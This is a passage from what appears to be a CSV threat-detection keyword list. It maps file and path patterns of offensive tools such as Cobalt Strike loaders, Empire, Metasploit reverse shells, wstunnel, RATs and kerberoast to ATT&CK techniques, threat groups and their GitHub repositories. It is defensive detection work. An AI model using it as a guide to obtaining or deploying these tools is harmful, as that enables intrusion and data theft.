Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12739" "*/ws-dirs.txt*",".{0,1000}\/ws\-dirs\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","12740" "*/ws-files.txt*",".{0,1000}\/ws\-files\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","12741" "*/WSMan-WinRM.git*",".{0,1000}\/WSMan\-WinRM\.git.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","12742" "*/WSManWinRM.ps1*",".{0,1000}\/WSManWinRM\.ps1.{0,1000}","offensive_tool_keyword","WSMan-WinRM","remote commands over WinRM using the WSMan.Automation COM object","T1021.004 - T1059.001","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/bohops/WSMan-WinRM","1","1","N/A","N/A","10","3","236","40","2020-05-12T16:49:01Z","2020-05-12T01:30:42Z","12743" "*/wso-webshell.git*",".{0,1000}\/wso\-webshell\.git.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - 
T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","1","N/A","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","12744" "*/WSPCoerce.git*",".{0,1000}\/WSPCoerce\.git.{0,1000}","offensive_tool_keyword","WSPCoerce","PoC to coerce authentication from Windows hosts using MS-WSP","T1557.001 - T1078.003 - T1059.003","TA0006 - TA0004 - TA0002","N/A","N/A","Exploitation tool","https://github.com/slemire/WSPCoerce","1","0","#linux","N/A","9","3","235","31","2023-09-07T14:43:36Z","2023-07-26T17:20:42Z","12745" "*/wstunnel wstunnel*",".{0,1000}\/wstunnel\swstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12746" "*/wstunnel.exe",".{0,1000}\/wstunnel\.exe","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12747" "*/wstunnel.git*",".{0,1000}\/wstunnel\.git.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12748" "*/wstunnel/certs/*",".{0,1000}\/wstunnel\/certs\/.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol 
- Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#linux","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12749" "*/wstunnel:latest*",".{0,1000}\/wstunnel\:latest.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","12750" "*/wwlib/lolbins/*",".{0,1000}\/wwlib\/lolbins\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - 
RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","12751" "*/www/exploit.html*",".{0,1000}\/www\/exploit\.html.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","N/A","4","396","54","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z","12752" "*/x11-access.nse*",".{0,1000}\/x11\-access\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12753" "*/x64/meterpreter/reverse_tcp_rc4*",".{0,1000}\/x64\/meterpreter\/reverse_tcp_rc4.{0,1000}","offensive_tool_keyword","metasploit","exploit used by Dispossessor ransomware group","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 - T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12754" "*/x64/Stardust.asm*",".{0,1000}\/x64\/Stardust\.asm.{0,1000}","offensive_tool_keyword","Stardust","A
modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","12755" "*/x64_slim.dll*",".{0,1000}\/x64_slim\.dll.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1110","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","12756" "*/xan7r/kerberoast*",".{0,1000}\/xan7r\/kerberoast.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","12759" "*/xar-1.5.2.tar.gz*",".{0,1000}\/xar\-1\.5\.2\.tar\.gz.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1111","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat 
- CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","12760" "*/xdmcp-discover.nse*",".{0,1000}\/xdmcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12761" "*/xen-mimi.ps1*",".{0,1000}\/xen\-mimi\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","12762" "*/xeno-rat.git*",".{0,1000}\/xeno\-rat\.git.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","1","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","12763" "*/XHVNC.exe*",".{0,1000}\/XHVNC\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12764" "*/XiebroC2.git*",".{0,1000}\/XiebroC2\.git.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - 
TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","12765" "*/XiebroC2/releases/download/*",".{0,1000}\/XiebroC2\/releases\/download\/.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","12766" "*/xml_attack.txt*",".{0,1000}\/xml_attack\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12767" "*/xml_attacks.txt*",".{0,1000}\/xml_attacks\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12768" "*/xmlrpc-methods.nse*",".{0,1000}\/xmlrpc\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12769" "*/xmpp-brute.nse*",".{0,1000}\/xmpp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12770" "*/xmpp-info.nse*",".{0,1000}\/xmpp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12771" "*/xndpxs/CVE-2022-0847*",".{0,1000}\/xndpxs\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/xndpxs/CVE-2022-0847","1","1","N/A","N/A","N/A","1","9","7","2022-03-07T17:59:12Z","2022-03-07T17:51:02Z","12775" "*/xor/stager.txt*",".{0,1000}\/xor\/stager\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","12776" "*/xor/xor.go*",".{0,1000}\/xor\/xor\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","12777" "*/XOR_b64_encrypted/*",".{0,1000}\/XOR_b64_encrypted\/.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","12778" "*/XorObfuscation.cs*",".{0,1000}\/XorObfuscation\.cs.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tool","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","N/A","6","520","79","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z","12779" "*/xpath_injection.txt*",".{0,1000}\/xpath_injection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","12780" "*/XpertRAT.exe*",".{0,1000}\/XpertRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12781" "*/xPipe/*",".{0,1000}\/xPipe\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF to list Windows Pipes & return their Owners & DACL Permissions","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - 
Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/xPipe","1","1","N/A","N/A","10","10","77","23","2023-03-08T15:51:47Z","2021-12-07T22:56:30Z","12782" "*/xRAT 2.exe*",".{0,1000}\/xRAT\s2\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12783" "*/xrat-master/*",".{0,1000}\/xrat\-master\/.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12784" "*/XRulez binaries.zip*",".{0,1000}\/XRulez\sbinaries\.zip.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 - TA0003 - TA0005 - 